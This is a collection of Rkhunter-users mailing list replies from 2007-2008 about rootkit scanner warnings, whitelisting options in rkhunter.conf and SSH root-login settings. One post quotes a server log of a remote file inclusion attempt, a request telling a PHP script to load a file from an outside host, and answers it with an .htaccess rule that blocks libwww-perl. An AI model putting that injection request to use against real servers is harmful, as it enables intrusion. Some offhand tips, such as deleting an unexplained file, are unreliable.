> Warning: Hidden directory found: /dev/.initramfs


Look into "/etc/rkhunter.conf", search for "hidden directories"

Viele Gruesse!
Helmut

-
Sponsored by: SourceForge.net Community Choice Awards: VOTE NOW!
Studies have shown that voting for your favorite open source project,
along with a healthy diet, reduces your potential for chronic lameness
and boredom. Vote Now at http://www.sourceforge.net/community/cca08
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

[Rkhunter-users] Installation (was: "Welcome" & "Please subscribe" in same message?)

[Helmut Hullen]

Hallo, Linda,

Du (linda) meintest am 21.06.08:

> Hi from a new member. I want to upgrade to the most recent version of
> Rootkit Hunter (1.3.2) but can't determine how to get it onto my
> server via PuTTY.

???
You have to "install" the downloaded package.

Viele Gruesse!
Helmut

-
Check out the new SourceForge.net Marketplace.
It's the best place to buy or sell services for
just about anything Open Source.
http://sourceforge.net/services/buy/index.php
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] doubt about ident warning menssege..

[Helmut Hullen]

Hallo, unspawn,

Du (unspawn) meintest am 13.06.08:

> It means that the inetd superserver allows remote parties to send
> ident queries to your machine on port TCP/113. This service is only
> necessary if remote mail or IRC servers require it.

No - the "ident" service is helpful on a squid server too, and there may  
be some other services.

Viele Gruesse!
Helmut

-
Check out the new SourceForge.net Marketplace.
It's the best place to buy or sell services for
just about anything Open Source.
http://sourceforge.net/services/buy/index.php
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Might be compromised?

[Helmut Hullen]

Hallo, Eric,

Du (mailinglists) meintest am 16.05.08:


> Scanning for hidden files...   [
> Warning! ] ---
> /etc/.pwd.lock /dev/.static
> /dev/.udev
> /dev/.initramfs
> /dev/.initramfs-tools
> ---
> Please inspect:  /dev/.static (directory)  /dev/.udev (directory)
> /dev/.initramfs (directory)

> This is the only item that was strange.

Look (in "/etc/rkhunter.conf") for "ALLOWHIDDENDIR" and  
"ALLOWHIDDENFILE".

> I think I am going to do a clean install over the weekend,

That makes not disappear these messages - you have to allow them in "/ 
etc/rkhunter.conf" (if these files or directories are ok).

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Microsoft 
Defy all challenges. Microsoft(R) Visual Studio 2008. 
http://clk.atdmt.com/MRT/go/vse012070mrt/direct/01/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Warnings rkhunter 1.3.2? Not in other versions...

[Helmut Hullen]

Hallo, Dave,

Du (rkhunter) meintest am 13.05.08:

>>> [11:41:26] Warning: Hidden file found:
>>> /usr/share/man/zh_CN/man1/..1.gz: gzip compressed data, from Unix,
>>> max compression

>> Strange. I'd delete this file.

> On our CentOS boxes I have to whitelist a similar file,
> /usr/share/man/man1/..1.gz. According to yum it belongs to the bash
> package,

Looking into the slackware bash packet (with "mc") I don't find such a  
file like "*/man1/..1*".

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Microsoft 
Defy all challenges. Microsoft(R) Visual Studio 2008. 
http://clk.atdmt.com/MRT/go/vse012070mrt/direct/01/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Warnings rkhunter 1.3.2? Not in other versions...

[Helmut Hullen]

Hallo, Boyd,

Du (gerberb) meintest am 12.05.08:

> [11:41:26]   Checking for hidden files and directories [ Warning ]
> [11:41:26] Warning: Hidden file found:
> /usr/share/man/man5/.k5login.5.gz: gzip compressed data, from Unix,
> max compression

Maybe ok.

> [11:41:26] Warning: Hidden file found:
> /usr/share/man/zh_CN/man1/..1.gz: gzip compressed data, from Unix,
> max compression

Strange. I'd delete this file.

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Microsoft 
Defy all challenges. Microsoft(R) Visual Studio 2008. 
http://clk.atdmt.com/MRT/go/vse012070mrt/direct/01/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] suspicious files opensuse 10.2

[Helmut Hullen]

Hallo, lists,

Du (mr.astral) meintest am 12.05.08:

> rkhunter gave me the following files a s suspicious...

> http://pastebin.ca/1012886

> Are these files "normal"

Look (in "/etc/rkhunter.conf") for "ALLOWDEVFILE".

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by the 2008 JavaOne(SM) Conference 
Don't miss this year's exciting event. There's still time to save $100. 
Use priority code J8TL2D2. 
http://ad.doubleclick.net/clk;198757673;13503038;p?http://java.sun.com/javaone
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] about usedzaRwT.KiT/zaRwT.KiT

[Helmut Hullen]

Hallo, unspawn,

Du (unspawn) meintest am 22.04.08:

>> By the way, how can I add some files to be checked?

> RKH is not a file integrity checker,

Sure?

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by the 2008 JavaOne(SM) Conference 
Don't miss this year's exciting event. There's still time to save $100. 
Use priority code J8TL2D2. 
http://ad.doubleclick.net/clk;198757673;13503038;p?http://java.sun.com/javaone
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] ¿It's my Debian hacked?

[Helmut Hullen]

Hallo, Pedro,

Du (ercrokan) meintest am 18.04.08:

> [20:00:55] Warning: The file properties have changed:
> [20:00:55] File: /usr/sbin/tcpd

> [20:00:55] Current file modification time: 1207324330
> [20:00:55] Stored file modification time : 1185732044

It has changed. Have you changed it?

If not: that may be malware.

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by the 2008 JavaOne(SM) Conference 
Don't miss this year's exciting event. There's still time to save $100. 
Use priority code J8TL2D2. 
http://ad.doubleclick.net/clk;198757673;13503038;p?http://java.sun.com/javaone
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] SSH warning

[Helmut Hullen]

Hallo, Mark,

Du (munguanaweza) meintest am 27.03.08:

> I receive this  warning after installation:

>  Checking if SSH root access is allowed   [ Warning ]

> I modify the /etc/ssh/sshd_config file to the following:

> PermitRootLogin no

What tells

grep ^ALLOW_SSH_ROOT /etc/rkhunter.conf

There must be the same option as in "/etc/ssh/sshd_config"

Viele Gruesse!
Helmut

-
Check out the new SourceForge.net Marketplace.
It's the best place to buy or sell services for
just about anything Open Source.
http://ad.doubleclick.net/clk;164216239;13503038;w?http://sf.net/marketplace
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Fwd: [rkhunter] Daily run

[Helmut Hullen]

Hallo, Eggert,

Du (eggert.ehmke) meintest am 22.01.08:

> I get this message on each run of rkhunter. Is this a false positive?

> This is rkhunter 1.2.9, Debian Etch

Make an update to "rkhunter 1.3.0"

> Scanning for hidden files...  [ Warning! ]
> -

> Found warnings:
> [02:32:33] WARNING, found:  /dev/.static (directory)  /dev/.udev
> (directory)  /dev/.initramfs (directory)

Look for "ALLOWHIDDENDIR" in "/etc/rkhunter.conf"

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Microsoft
Defy all challenges. Microsoft(R) Visual Studio 2008.
http://clk.atdmt.com/MRT/go/vse012070mrt/direct/01/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] missing hashes 3

[Helmut Hullen]

Hallo, Dogsbody,

Du (dan) meintest am 28.12.07:

>> There you should find an entry for "less" (among many other entrys).
>> It should be a new file (produced by "rkhunter --propupd").

> Yes, as Larry says, this file seems to get updated except for the
> hashes for these three files, it's all very strange.

Just to make you nervous: can you put clean files into your computer  
(via a live CD)?
Perhaps for the md5sum job too.

> # which -a less
> /usr/bin/less
> # locate bin/less | grep less$
> /usr/bin/less

Ok - no second file.

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Microsoft
Defy all challenges. Microsoft(R) Visual Studio 2005.
http://clk.atdmt.com/MRT/go/vse012070mrt/direct/01/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] missing hashes 3

[Helmut Hullen]

Hallo, Larry,

Du (rkhunter) meintest am 28.12.07:

>> /var/lib/rkhunter/db/rkhunter.dat
>> There you should find an entry for "less" (among many other entrys).
>> It should be a new file (produced by "rkhunter --propupd").

> /usr/local/rkhunter/lib/rkhunter/db/rkhunter.dat is where I found
> mine, all of the ones RKHunter is whinging about are listed without
> hashes and show the correct path!

Strange.
Should be:
File:/usr/bin/less:::rights:owner:group:length:

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Microsoft
Defy all challenges. Microsoft(R) Visual Studio 2005.
http://clk.atdmt.com/MRT/go/vse012070mrt/direct/01/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] missing hashes 3

[Helmut Hullen]

Hallo, Dogsbody,

Du (dan) meintest am 25.12.07:

> After upgrading my operating system (CentOS 4.5 to 4.6) I am getting
> some errors   I don't quite understand.  After upgrading I did a
> --propupd.

> # rkhunter --propupd
> [ Rootkit Hunter version 1.3.0 ]
> File updated: searched for 147 files, found 124, missing hashes 3

> # rkhunter --cronjob --report-warnings-only
> Warning: No hash value found for file '/usr/bin/less' in the
> rkhunter.dat file.

/var/lib/rkhunter/db/rkhunter.dat

There you should find an entry for "less" (among many other entrys). It  
should be a new file (produced by "rkhunter --propupd").

What tells

which -a less

locate bin/less | grep less$

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Microsoft
Defy all challenges. Microsoft(R) Visual Studio 2005.
http://clk.atdmt.com/MRT/go/vse012070mrt/direct/01/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] False warnings on FreeBSD

[Helmut Hullen]

Hallo, AnMaster,

Du (anmaster) meintest am 15.12.07:


> Also I get warnings like this:
> [13:57:24] /usr/bin/whatis   [
> Warning ] [13:57:24] Warning: The command '/usr/bin/whatis' has been
> replaced by a script: /usr/bin/whatis: Bourne shell script text
> executable [13:57:27] /usr/sbin/adduser

Look into "/etc/rkhunter.conf", search for "SCRIPTWHITELIST"

> Another one:
> [13:59:12] Info: Found password file: /etc/passwd
> [13:59:12]   Checking for root equivalent (UID 0) accounts   [
> Warning ] [13:59:12] Warning: Account 'toor' is root equivalent (UID
> = 0)

Look into "/etc/rkhunter.conf", search for "UID0_ACCOUNTS"

> I hope these issues get fixed

They are fixed ...

Viele Gruesse!
Helmut

-
SF.Net email is sponsored by:
Check out the new SourceForge.net Marketplace.
It's the best place to buy or sell services
for just about anything Open Source.
http://ad.doubleclick.net/clk;164216239;13503038;w?http://sf.net/marketplace
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Possible rootkit?

[Helmut Hullen]

Hallo, Johan,

Du (johan.sundstrom) meintest am 03.12.07:

> IP Address of attacker: xxx.yyy.zzz.zzz

> Type of attack: URL Injection -- attempt to inject / load files onto
> the server via PHP/CGI vulnerabilities

> Sample log report including date and time stamp:

>   Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - -
> [01/Dec/2007:16:59:21 -0800] "GET

> /logos/banners//index.php?skin_file=http://www.n0n-clan.net//vwar/con
> vert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"

I stop these nasty scripts with an entry in the ".htaccess" file in the  
apache "DocumentRoot":

BrowserMatchNoCase "^libwww-perl" botnet

order allow,deny
allow from all
deny from env=botnet

You can choose another name than "botnet", you can add other definitions  
for this self defined environment variable(s). The "order/allow/deny"  
block first allows "all" and then blocks all defined requests.

Without this entry the tries result in error level 404 (or 500) in  
"error_log". With this entry they produce error level 403.

I have tried this entry on a website with about 2000 visits a day; over  
a month there was no "good" try with the Browser "libwww-perl". Only  
nasty scripts.

Viele Gruesse!
Helmut

-
SF.Net email is sponsored by: The Future of Linux Business White Paper
from Novell.  From the desktop to the data center, Linux is going
mainstream.  Let it simplify your IT future.
http://altfarm.mediaplex.com/ad/ck/8857-50307-18918-4
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] found enabled xinetd service

[Helmut Hullen]

Hallo, John,

Du (john.horne) meintest am 16.11.07:

>> "rkhunter" works well (at least I hope so ...). But it always tells
>> "Warning: Found enabled xinetd service: /etc/xinetd.conf"

> To whitelist the above message add
> 'XINETD_ALLOWED_SVC=/etc/xinetd.conf' to your rkhunter.conf file.

Ok - it works.

XINETD_CONF_PATH=/etc/xinetd.conf
XINETD_ALLOWED_SVC=/etc/xinetd.conf

and the allowed services inside /etc/xinetd.d (regardless wether they  
are enabled or disabled).

No more warnings - thank you!

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Microsoft
Defy all challenges. Microsoft(R) Visual Studio 2005.
http://clk.atdmt.com/MRT/go/vse012070mrt/direct/01/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

[Rkhunter-users] SSH message doesn't fit

[Helmut Hullen]

Hallo, rkhunter-users,

in de.comp.os.unix.linux.misc a collegue reported

>>> Warning: The SSH and rkhunter configuration options should be the
>>> same:   SSH configuration option 'PermitRootLogin': yes
>>>   Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no

> :~# grep -i PermitRootLogin /etc/ssh/sshd_config
> PermitRootLogin yes
> :~# grep -i ALLOW_SSH_ROOT_USER /etc/rkhunter.conf
> ALLOW_SSH_ROOT_USER=yes

Why does "rkhunter" mourn about different configuration options?

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Microsoft
Defy all challenges. Microsoft(R) Visual Studio 2005.
http://clk.atdmt.com/MRT/go/vse012070mrt/direct/01/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

[Rkhunter-users] found enabled xinetd service

[Helmut Hullen]

Hallo, rkhunter-users,

"rkhunter" works well (at least I hope so ...). But it always tells  
"Warning: Found enabled xinetd service: /etc/xinetd.conf"

I use inetd, but (for other reasons) "/etc/xinetd.conf" exists, and "/ 
etc/xinetd.d" exists with 2 entries.

How can I tell "rkhunter" not to mourn?
I have tried "#" for commenting in and out (?) the lines in "/etc/ 
rkhunter.conf" - doesn't help (or I haven't found the only right way).

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >> http://get.splunk.com/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Many new warnings on FreeBSD

[Helmut Hullen]

Hallo, John,

Du (john.horne) meintest am 23.10.07:

>> But when RKH can find the actual value of "PermitRootLogin": why
>> does it need an entry in "/etc/rkhunter.conf"?

> To see if the value has been changed. If a hacker changes your
> "PermitRootLogin" to 'yes' in sshd_config, then you will probably
> want to know about it.

Ok - sounds reasonable.

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >> http://get.splunk.com/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Many new warnings on FreeBSD

[Helmut Hullen]

Hallo, John,

Du (john.horne) meintest am 23.10.07:

>> since upgrading RKHunter to the current version 1.3.0 i got multiple
>> new warning messages on my FreeBSD box.


>> Warning: No local startup files found.
>>
>> -> Why is this resulting in a warning if no local startup file was
>> -> found?
>>
> In this case the check is for the file used for local startup
> modifications. Typically something like /etc/rc.d/rc.local or
> rc.sysinit. Again, having no such file is suspicious.

Can you do some tricks with "OS_VERSION_FILE"?

  http://arktur.de/Wiki/Entwicklung:UIDGID#Kennungen
  http://arktur.shuttle.de/beta/Paketbau.shtml#init

I have no informations about the BSD names and locations, but perhaps I  
(or someone else) could find them in packets which fit for many  
distributions, p.e. LTSP or apcupsd.

By the way: I have built a slackwware tarball:

http://arktur.shuttle.de/CD/5.0-slack/slack/n1/rkhunter-1.3.0-noarch-1hln.tgz

> The value of 'PermitRootLogin' in the sshd_config must be exactly the
> same as that in the rkhunter.conf file (the ALLOW_SSH_ROOT_USER
> option). Since SSH defaults to 'yes', and RKH defaults to 'no', you
> get a warning. You need to set the option in the sshd_config file to
> some value suitable for your requirements, and then set
> ALLOW_SSH_ROOT_USER to the same value in the rkhunter.conf file. (I
> guess we should allow some setting for when the 'PermitRootLogin' is
> unset.)

But when RKH can find the actual value of "PermitRootLogin": why does it  
need an entry in "/etc/rkhunter.conf"?

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >> http://get.splunk.com/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Many new warnings on FreeBSD

[Helmut Hullen]

Hallo, Avalon,

Du (third-chance) meintest am 23.10.07:

> thank you, Helmut, for your fast reply. I must have been blind when i
> was looking over the default config. I found the settings you
> described and they worked well.

Don't mention - I had searched for these errors some hours ago ...

> This seems to be different under FreeBSD too. Both settings
> "PermitRootLogin no" and "Protocol 2" are commented out in my
> sshd_config, which is the default on FreeBSD. Root-Login is
> definitely not permitted under FreeBSD out-of-the-box - until now i
> was quite sure about that ;-)

In Linux-SSHD "PermitRootLogin=yes" is the default value.

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >> http://get.splunk.com/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Many new warnings on FreeBSD

[Helmut Hullen]

Hallo, John,

Du (john.horne) meintest am 23.10.07:

>> This seems to be different under FreeBSD too. Both settings
>> "PermitRootLogin no" and "Protocol 2" are commented out in my
>> sshd_config, which is the default on FreeBSD. Root-Login is
>> definitely not permitted under FreeBSD out-of-the-box - until now i
>> was quite sure about that ;-)
>>
> Either the comments in the sshd_config file or the man page for
> sshd_config should be able to provide you with a definite answer as
> to what the defaults are.

>From where gets RKH the information: from the config file or from the  
running daemon?

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >> http://get.splunk.com/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Many new warnings on FreeBSD

[Helmut Hullen]

Hallo, Avalon,

Du (third-chance) meintest am 23.10.07:

> Can anyone give me a hint how to suppress the following messages:

> /usr/bin/whatis   [ Warning ]
> Warning: The command '/usr/bin/whatis' has been replaced by a script:
> /usr/bin/whatis: Bourne shell script text executable

Take "/etc/rkhunter.conf", search for "SCRIPTWHITELIST"

> Info: Starting test name 'possible_rkt_strings'
> Warning: Checking for possible rootkit strings  [ Warning ]
> No system startup files found.

->> Why is this resulting in a warning if no startup file was found?

Take "/etc/rkhunter.conf", search for "startup"

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >> http://get.splunk.com/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] rkunter

[Helmut Hullen]

Hallo, B?rje,

Du (kaboki) meintest am 22.10.07:

> Got this while scanning with rkhunter, and was wondering what it
> means?

> [06:25:39] WARNING, found:  /dev/.static (directory)  /dev/.udev
> (directory)  /dev/.initramfs (directory)

That's simple: look into "/etc/rkhunter.conf", search for "/dev/.udev".

Viele Gruesse!
Helmut

-
This SF.net email is sponsored by: Splunk Inc.
Still grepping through log files to find problems?  Stop.
Now Search log events and configuration files using AJAX and a browser.
Download your FREE copy of Splunk now >> http://get.splunk.com/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users